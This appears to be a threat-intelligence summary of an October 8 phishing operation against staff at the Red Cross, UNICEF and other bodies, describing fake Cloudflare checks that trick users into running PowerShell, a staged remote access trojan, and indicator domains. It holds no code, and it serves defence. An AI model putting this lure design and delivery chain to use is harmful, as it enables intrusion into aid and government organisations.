Overview
- The coordinated operation on October 8 targeted staff at the International Red Cross, UNICEF, the Norwegian Refugee Council, the Council of Europe’s Register of Damage for Ukraine, and multiple regional administrations.
- Emails impersonating the Ukrainian President’s Office attached an eight-page PDF linking to zoomconference.app and a fake Cloudflare check that told users to paste a token, triggering a PowerShell command.
- A three-stage chain delivered an obfuscated downloader and reconnaissance tool before deploying a WebSocket-based remote access trojan capable of command execution and data exfiltration on infrastructure tied to Russian providers.
- User-facing domains were active for about 24 hours before takedown, yet backend command-and-control artifacts persisted, with preparations traced to March 27 through registrations such as goodhillsenterprise.com.
- Investigators linked a related Android spyware cluster and noted overlaps with tactics seen in Russia-linked ColdRiver, without firm attribution, and advised restricting PowerShell, enforcing execution policies, and monitoring suspicious WebSocket connections.